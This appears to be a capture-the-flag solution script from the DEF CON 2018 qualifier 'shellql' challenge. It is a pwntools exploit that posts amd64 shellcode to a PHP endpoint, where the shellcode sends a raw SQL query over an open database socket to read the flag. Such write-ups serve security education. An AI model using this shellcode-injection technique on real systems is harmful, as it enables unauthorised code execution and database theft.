```python  
#!/usr/bin/env python2  
from pwn import *  
import requests

"""  
* will execute our shellcode  
* only read/write due to prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT)  
* have to return valid HTTP response otherwise will get 500  
* can query the db using fd 4   
"""

context.arch = "amd64"  
context.os = "linux"

host = "http://b9d6d408.quals2018.oooverflow.io/cgi-bin/"  
html = """X-Powered-By: PHP/7.0.28-0ubuntu0.16.04.1\r\nContent-Type:
text/html; charset=UTF-8\r\n\r\n<html><body>Hello World!</body></html>"""

query = "SELECT * from flag;"

shellcode = ""  
shellcode += shellcraft.echo(p16(len(query)) + "\x00\x00\x03" + query , 4)  
shellcode += shellcraft.read(4, 'rsp', 200)  
shellcode += shellcraft.pushstr(html)  
shellcode += shellcraft.write(1, 'rsp', 500)

data = {  
"shell": asm(shellcode) + "\x00"  
}

resp = requests.post(host + "index.php", data=data)  
print resp.text

```

\--vakzz

Original writeup (https://devcraft.io/2018/05/21/shellql-def-con-ctf-
qualifier-2018.html).